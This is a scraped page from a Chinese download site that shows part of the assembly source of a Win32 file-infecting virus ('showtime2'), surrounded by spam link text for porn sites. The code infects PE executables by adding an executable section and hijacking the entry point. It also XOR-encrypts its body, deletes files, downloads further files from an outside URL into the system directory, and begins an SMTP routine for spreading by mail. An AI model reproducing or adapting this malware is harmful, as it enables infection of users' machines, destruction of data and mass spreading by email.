亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來(lái)到蟲(chóng)蟲(chóng)下載站! | ?? 資源下載 ?? 資源專(zhuān)輯 ?? 關(guān)于我們
? 蟲(chóng)蟲(chóng)下載站

?? win32.poly.showtime2.txt

?? 簡(jiǎn) 介: 1. 感染本地硬盤(pán)和網(wǎng)絡(luò)上所有exe(GUI)文件  2. 搜索本地所有郵件地址
?? TXT
?? 第 1 頁(yè) / 共 3 頁(yè)
字號(hào):
EN_NEXT: 
push edi 
push hSearch 
call _FindNextFile[ebx]

.UNTIL eax==0 ;FindNexeFile fail 

ED_Close: 
push hSearch 
call _FindClose[ebx]
ED_Exit: 
popad 
ret 8 
EnumDir ENDP  


AnFile PROC FileName:DWORD,FileType:DWORD 

pushad 

AF_00: lodsb 
or al,al 
jnz AF_00 
.if FileType == FILE_ALL ;all 
   push FileName 
   call _DeleteFile[ebx] 
.elseif FileType == FILE_EXE ;exe 
   mov eax,DWORD ptr [esi-5] 
   .if eax =="exe." 
     push FileName 
     call InfectFile  
    
   .elseif eax == "mth." 
     push FileName 
     call Parse_HTM 
   .endif 

.endif 
popad 
ret 8 
AnFile ENDP 

;感染PE文件 
InfectFile PROC FileName : DWORD 

LOCAL hFile : DWORD 
LOCAL hMapping : DWORD 
LOCAL pMapping : DWORD 
LOCAL ByteWrite: DWORD 

pushad 
push NULL 
push FILE_ATTRIBUTE_NORMAL 
push OPEN_EXISTING 
push NULL 
push FILE_SHARE_READ+FILE_SHARE_WRITE 
push GENERIC_READ+GENERIC_WRITE 
push FileName 
call _CreateFile[ebx];打開(kāi)要感染的文件
cmp eax,INVALID_HANDLE_VALUE 
jz IF_Exit 
mov hFile,eax 
push 0 
push 0 
push 0 
push PAGE_READWRITE 
push NULL 
push hFile 
call _CreateFileMapping[ebx] ;創(chuàng)建內(nèi)存映射文件
or eax,eax 
jz IF_F3 
mov hMapping , eax 

push 0 
push 0 
push 0 
push FILE_MAP_READ+FILE_MAP_WRITE 
push hMapping 
call _MapViewOfFile[ebx] ;映射為可讀寫(xiě)
or eax,eax 
jz IF_F2 
mov pMapping,eax 
mov esi,eax 

assume esi :ptr IMAGE_DOS_HEADER;ESI指向IMAGE_DOS_HEADER結(jié)構(gòu)
.IF [esi].e_magic!=IMAGE_DOS_SIGNATURE ;是否是MZ
jmp IF_F1 
.ENDIF 

.IF [esi].e_lfarlc!=040h 
jmp IF_F1 
.ENDIF 

add esi,[esi].e_lfanew ;此時(shí)edx指向IMAGE_NT_HEADERS 
assume esi:ptr IMAGE_NT_HEADERS 
.IF [esi].Signature!=IMAGE_NT_SIGNATURE ;是PE文件嗎? 
jmp IF_F1 
.ENDIF 
.IF word ptr [esi].OptionalHeader.Subsystem!=2 
jmp IF_F1 
.ENDIF 

.IF word ptr [esi+1ah]==0888h ; 感染標(biāo)志
jmp IF_F1 
.ENDIF 

mov eax,[esi].OptionalHeader.AddressOfEntryPoint;取原程序入口偏移 
add eax,[esi].OptionalHeader.ImageBase ;加上基地址
mov HostEntry[ebx],eax ;保存原入口 
;*************************************************************** 
;判斷是否有足夠空間存儲(chǔ)新節(jié) 
;28h=sizeof IMAGE_SECTION_HEADER 
;18h=sizeof IMAGE_FILE_HEADER+Signature 
;edi將指向新節(jié) 
;*************************************************************** 
movzx eax,[esi].FileHeader.NumberOfSections ;取文件中的塊數(shù)
mov ecx,28h 
mul ecx 

lea edi,[esi] 
sub edi,pMapping 
add eax,edi 
add eax,18h 
movzx edi,[esi].FileHeader.SizeOfOptionalHeader 
add eax,edi 
mov edi,eax 
add edi,pMapping ;I forgot this first 
add eax,28h 

.IF eax>[esi].OptionalHeader.SizeOfHeaders 
jmp IF_F1 
.ENDIF 

;***************************************** 
;空間允許, ^0^,開(kāi)始插入新節(jié)并填充各字段 
;esi指向原文件最后一個(gè)節(jié),利用它來(lái)填充新節(jié)某些字段 
;***************************************** 
inc [esi].FileHeader.NumberOfSections 
assume edi:ptr IMAGE_SECTION_HEADER 
mov dword ptr[edi],69657769h ;"haiwei"
mov WORD ptr [edi+4],6168h;
push [esi].OptionalHeader.SizeOfImage 
pop eax
mov ecx,[esi].OptionalHeader.SectionAlignment
div ecx
inc eax
mul ecx
push eax ;塊對(duì)齊 


pop [edi].VirtualAddress 
mov eax,VirusLen 
mov [edi].Misc.VirtualSize,eax 
mov ecx,[esi].OptionalHeader.FileAlignment 
div ecx 
inc eax 
mul ecx 
mov [edi].SizeOfRawData,eax 

lea eax,[edi-28h+14h] ;PointerToRawData 
mov eax,[eax] 
lea ecx,[edi-28h+10h] ;SizeOfRawData 
mov ecx,[ecx] 
add eax,ecx 
mov [edi].PointerToRawData,eax 
mov [edi].Characteristics,0E0000020h ;可讀可寫(xiě)可執(zhí)行 


;*************************************************************** 
;更新SizeOfImage,AddressOfEntryPoint,使新節(jié)可以正確加載并首先執(zhí)行 
;*************************************************************** 

mov eax,[edi].Misc.VirtualSize 
mov ecx,[esi].OptionalHeader.SectionAlignment 
div ecx 
inc eax 
mul ecx 
add eax,[esi].OptionalHeader.SizeOfImage 
mov [esi].OptionalHeader.SizeOfImage,eax 

mov eax,[edi].VirtualAddress 

mov [esi].OptionalHeader.AddressOfEntryPoint,eax 
mov word ptr [esi+1ah],0888h ;寫(xiě)入感染標(biāo)志 

push PAGE_EXECUTE_READWRITE
push MEM_COMMIT
push VirusLen
push NULL
call _VirtualAlloc[ebx]
or eax,eax
jz IF_F1
mov pMem[ebx],eax
push edi
push esi
mov edi,eax
lea esi,[offset VStart+ebx]
mov ecx,VirusLen
cld
rep movsb
lea eax,[offset Load+ebx]
push ecx
lea ecx,[offset VStart+ebx]
sub eax,ecx
add eax,pMem[ebx]
pop ecx
mov ecx,EncryptLen/4
En:
xor DWORD ptr [eax],12345678h
add eax,4
loop En
pop esi
pop edi
push FILE_BEGIN 
push 0 
push [edi].PointerToRawData 
push hFile 
call _SetFilePointer[ebx]

;**************************************************************** 
;設(shè)置文件指針到結(jié)尾后,寫(xiě)入從VStart開(kāi)始的代碼,大小經(jīng)過(guò)文件對(duì)齊 
;**************************************************************** 
push 0 
lea eax,ByteWrite 
push eax 
push VirusLen 
mov eax,pMem[ebx] 
push eax 
push hFile 
call _WriteFile[ebx]

IF_F1: 
push pMapping 
call _UnmapViewOfFile[ebx]
IF_F2: 
push hMapping 
call _CloseHandle[ebx] 
IF_F3: 
push hFile 
call _CloseHandle[ebx] 
IF_Exit: 
popad 
ret 4 
InfectFile ENDP 
;*******************************
;下載文件代碼
;*******************************

DownloadFile proc dwFile:DWORD 
   pushad
   call szWininet
db "Wininet.dll",0
szWininet:
   call _LoadLibraryA[ebx]
or eax,eax
jz DF_ret
mov esi,eax

push MAX_PATH
call szFileName
  dwFileName db MAX_PATH dup(0)

szFileName:
pop edi
push edi
    call _GetSystemDirectory[ebx]
or eax,eax
jz DF_ret
    @pushsz "\"
push edi
call _lstrcat[ebx]
push dwFile
push edi
call _lstrcat[ebx]

push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ
push GENERIC_READ OR GENERIC_WRITE
push edi
call _CreateFile[ebx]
cmp eax,INVALID_HANDLE_VALUE
jnz Fexsting

call szInternetOpen
db "InternetOpenA",0
szInternetOpen:
   push esi
call _GetProcAddress[ebx]

push 0
push NULL
push NULL
push INTERNET_OPEN_TYPE_PRECONFIG
   call AgentName
db "szlogin",0
AgentName:

call eax
   or eax,eax
 jz DF_ret
   mov hSession[ebx],eax
 
 call szInternetOpenUrl
 db "InternetOpenUrlA",0
   _InternetOpenUrlA dd 0
szInternetOpenUrl:
   push esi
 call _GetProcAddress[ebx]
 mov DWORD ptr _InternetOpenUrlA[ebx],eax
 call Url
 db "http://xxx.net/",0

   szUrl db MAX_PATH dup (0)
Url:
   lea edi,[offset szUrl+ebx]
 push edi
 call _lstrcpy[ebx]
 push dwFile
   push edi
 call _lstrcat[ebx]

 push 0
 push INTERNET_FLAG_NO_AUTO_REDIRECT
 push 0
 push NULL
   push edi
 push hSession[ebx]
   call _InternetOpenUrlA[ebx]
   or eax,eax
 jz DF_ret
 mov DWORD ptr hHttpFile[ebx],eax
mov DWORD ptr dwRead[ebx],MAX_PATH
call szHttpQueryInfo
db "HttpQueryInfoA",0
szHttpQueryInfo:
   push esi
call _GetProcAddress[ebx]
   mov edi,eax
push NULL
lea ecx,[offset dwRead+ebx]
push ecx
  lea ecx,[offset szBuffer+ebx]
push ecx
   push HTTP_QUERY_STATUS_CODE
push hHttpFile[ebx]
call edi
push NULL
lea ecx,[offset dwRead+ebx]
push ecx
  lea ecx,[offset szBuffer+ebx]
push ecx
   push HTTP_QUERY_CONTENT_LENGTH
push hHttpFile[ebx]
call edi

    push NULL
push FILE_ATTRIBUTE_NORMAL
push CREATE_NEW
push NULL
push FILE_SHARE_READ
push GENERIC_READ OR GENERIC_WRITE
lea ecx,[offset dwFileName+ebx]
push ecx

call _CreateFile[ebx]
cmp eax,INVALID_HANDLE_VALUE
jz DF_ret
    mov hSaveFile[ebx],eax



call szInternetReadFile
db "InternetReadFile",0
szInternetReadFile:
     push esi
call _GetProcAddress[ebx]
mov edi,eax
.repeat     
lea ecx,[offset dwRead+ebx]
push ecx

push sizeof szBuffer
lea ecx,[offset szBuffer+ebx]
push ecx
push hHttpFile[ebx]

call edi
   
.if eax
.break .if dwRead[ebx]== 0
push NULL
lea ecx,[offset dwWrite+ebx]
push ecx

push dwRead[ebx]
lea ecx,[offset szBuffer+ebx]
push ecx
push hSaveFile[ebx]
call _WriteFile[ebx]
    
.endif
.until 0

Fexsting:   
    push MAX_PATH
lea edi,[offset dwFileName+ebx]
push edi
    call _GetSystemDirectory[ebx]
or eax,eax
jz DF_ret
    @pushsz "\"
push edi
call _lstrcat[ebx]
push dwFile
push edi
call _lstrcat[ebx]


    
DF_ret:
  push hSaveFile[ebx]
call _CloseHandle[ebx]
call szInternetCloseHandle
db "InternetCloseHandle",0
szInternetCloseHandle:
   push esi
call _GetProcAddress[ebx]
   mov edi,eax
push hHttpFile[ebx]
call edi
   push hSession[ebx]
call edi

popad
  lea eax,[offset dwFileName+ebx]
ret
DownloadFile endp


;**************************************
;發(fā)送郵件過(guò)程
;**************************************
SendMail proc eMail:DWORD 
  pushad
lea ecx,[offset wsa+ebx]
push ecx
push 101h
call _WSAStartup[ebx]
or eax,eax
jnz SM_ret
  push 0
push SOCK_STREAM
push AF_INET
call _socket[ebx]
cmp eax,-1h
jz SM_ret
mov esi,eax
lea edi,[offset sock+ebx]
assume edi:ptr sockaddr_in
mov [edi].sin_family,AF_INET
push 25
call _htons[ebx]
mov [edi].sin_port,ax
call PushSmtpSrvr
db "smtp.163.com",0
PushSmtpSrvr:
call _gethostbyname[ebx]
assume eax:ptr hostent
mov eax,DWORD ptr [eax].h_list
mov eax,DWORD ptr [eax]
mov eax,DWORD ptr [eax]
mov DWORD ptr[edi].sin_addr,eax
push sizeof sockaddr_in
push edi
push esi
call _connect[ebx]
cmp eax,-1h
jz SM_ret
push 0
push 13
call Ehlo
db "EHLO o1i5a4",0dh,0ah
  buffer db 2000h dup(0)
  szCap db "test",0

Ehlo:
  push esi 
  call _send[ebx]
push 0
push 12
call Auth

db "AUTH LOGIN",0dh,0ah

Auth:
  push esi
call _send[ebx]
push 0
push 18

call szUserName
db "dfadsfaadf",0dh,0ah,0
szUserName:
push esi
call _send[ebx] ;發(fā)送用戶名.......
push 0
push 14

call Pass
password db "xxxxxxxxx",0dh,0ah,0 ;這里是經(jīng)過(guò)BASE64編碼的密碼
Pass:
push esi
call _send[ebx]
  ;invoke recv,esi,addr buffer,2000h,0
;invoke MessageBox,NULL,addr buffer,addr szCap,MB_OK

push 0
push 32
call Mailfrom

   db "MAIL FROM: xxxx@163.com",0dh,0ah
Mailfrom:

?? 快捷鍵說(shuō)明

復(fù)制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號(hào) Ctrl + =
減小字號(hào) Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
精品亚洲国产成人av制服丝袜 | 在线日韩一区二区| 国产麻豆精品久久一二三| 激情综合色播激情啊| 久久成人18免费观看| 蜜桃av噜噜一区二区三区小说| 日日摸夜夜添夜夜添精品视频| 五月婷婷色综合| 五月天视频一区| 午夜精品免费在线| 日韩成人精品视频| 久久www免费人成看片高清| 极品少妇xxxx精品少妇偷拍| 国产美女一区二区| 99视频一区二区| 在线一区二区视频| 欧美日韩国产影片| 日韩一级黄色片| 久久久一区二区三区| 国产精品久久看| 一区二区三区在线免费视频| 亚洲高清久久久| 麻豆精品国产传媒mv男同| 国产激情精品久久久第一区二区| 成人h动漫精品一区二| 91国偷自产一区二区三区成为亚洲经典| 欧美性受xxxx黑人xyx| 在线不卡a资源高清| 精品国产一区二区三区忘忧草 | 麻豆一区二区三| 国模套图日韩精品一区二区 | 欧美日韩国产综合视频在线观看| 欧美一级日韩免费不卡| 久久久五月婷婷| 亚洲你懂的在线视频| 日韩av电影天堂| 大陆成人av片| 欧美日免费三级在线| 精品91自产拍在线观看一区| 中文字幕亚洲精品在线观看| 一区二区三区欧美日| 久久99精品久久久久久| 97国产精品videossex| 欧美肥胖老妇做爰| 国产女人水真多18毛片18精品视频 | 久久亚洲一区二区三区明星换脸| 国产精品丝袜久久久久久app| 亚洲一区精品在线| 国产精品亚洲视频| 欧美最新大片在线看 | 亚洲精品美国一| 捆绑调教一区二区三区| 97国产精品videossex| 欧美成人激情免费网| 亚洲欧美一区二区三区孕妇| 麻豆精品在线视频| 一本久久精品一区二区| 精品蜜桃在线看| 亚洲网友自拍偷拍| 成人av网站大全| 欧美电影精品一区二区| 亚洲激情男女视频| 国产精品夜夜嗨| 日韩一区二区电影网| 亚洲蜜桃精久久久久久久| 国产一区二区毛片| 欧美老女人第四色| 成人欧美一区二区三区小说| 精品亚洲成a人| 欧美巨大另类极品videosbest| 国产精品久线观看视频| 激情国产一区二区| 欧美精品在欧美一区二区少妇| 中文字幕在线免费不卡| 国产乱国产乱300精品| 9191久久久久久久久久久| 亚洲男人天堂av网| 国产suv一区二区三区88区| 日韩一区二区三| 午夜视频在线观看一区| 一本色道久久综合精品竹菊| 国产精品午夜电影| 国产在线视频一区二区| 欧美一二区视频| 天使萌一区二区三区免费观看| 一本久道久久综合中文字幕| 中文字幕免费一区| 国产不卡视频在线播放| 久久综合色鬼综合色| 免费在线成人网| 日韩一卡二卡三卡国产欧美| 日韩中文字幕一区二区三区| 欧美色倩网站大全免费| 亚洲精品伦理在线| 91原创在线视频| 亚洲欧洲精品天堂一级| 99精品热视频| 亚洲色图欧美偷拍| 97精品国产97久久久久久久久久久久| 欧美国产综合一区二区| 国产激情一区二区三区四区 | 国产亚洲一区二区三区| 狠狠色丁香久久婷婷综| 精品蜜桃在线看| 韩国精品久久久| 精品处破学生在线二十三| 老司机免费视频一区二区三区| 日韩欧美中文一区| 激情五月播播久久久精品| 精品少妇一区二区三区日产乱码| 美女脱光内衣内裤视频久久影院| 日韩色视频在线观看| 美国一区二区三区在线播放| 日韩精品一区二区三区swag| 久久99精品久久久| 国产丝袜欧美中文另类| 成人免费视频免费观看| 一区在线中文字幕| 91成人在线免费观看| 亚洲成a人片在线不卡一二三区 | 中文字幕免费不卡在线| 丰满亚洲少妇av| 亚洲欧美二区三区| 欧美日韩精品是欧美日韩精品| 秋霞午夜av一区二区三区| 欧美成人伊人久久综合网| 国产一区二区在线视频| 国产精品私人影院| 91福利国产成人精品照片| 视频一区中文字幕国产| 亚洲精品一区二区三区精华液 | 成人黄色777网| 一区二区在线观看不卡| 欧美色视频在线观看| 美女视频网站久久| 国产精品视频一二三| 色94色欧美sute亚洲线路一久| 亚洲国产欧美一区二区三区丁香婷| 欧美夫妻性生活| 国产精品一二三在| 亚洲欧美一区二区三区国产精品 | 在线视频你懂得一区| 视频一区在线视频| 国产无遮挡一区二区三区毛片日本| 99精品在线免费| 日本女人一区二区三区| 中文字幕精品一区| 欧美色网一区二区| 精品夜夜嗨av一区二区三区| 亚洲手机成人高清视频| 日韩免费看的电影| 91麻豆成人久久精品二区三区| 日韩精品成人一区二区三区| 日本一区二区高清| 欧美日韩国产在线观看| 国产mv日韩mv欧美| 三级欧美韩日大片在线看| 久久新电视剧免费观看| 欧美自拍偷拍一区| 国产精品亚洲成人| 亚洲第一成人在线| 欧美经典三级视频一区二区三区| 欧美日韩在线免费视频| 成人网页在线观看| 日韩国产在线观看| 亚洲天堂精品视频| www日韩大片| 欧美乱妇15p| 成人动漫在线一区| 麻豆精品视频在线| 亚洲国产日韩一级| 欧美国产禁国产网站cc| 欧美videos中文字幕| 欧美三电影在线| 91一区二区在线| 国产精品123区| 蜜桃在线一区二区三区| 一二三区精品视频| 国产精品毛片久久久久久| 精品日韩一区二区| 欧美蜜桃一区二区三区| 成人av在线网| 国产99久久久精品| 免费一级欧美片在线观看| 亚洲一级二级在线| 亚洲靠逼com| 综合久久综合久久| 国产欧美综合在线观看第十页| 日韩一区二区三区免费观看| 欧美日高清视频| 欧美午夜精品一区二区三区| 99热99精品| 国产精品一二三四五| 国内精品国产成人| 久久精品国产在热久久| 日本成人在线电影网| 亚洲国产成人av好男人在线观看| 成人免费小视频| 中文字幕一区二区三区四区不卡| 国产日韩欧美精品电影三级在线|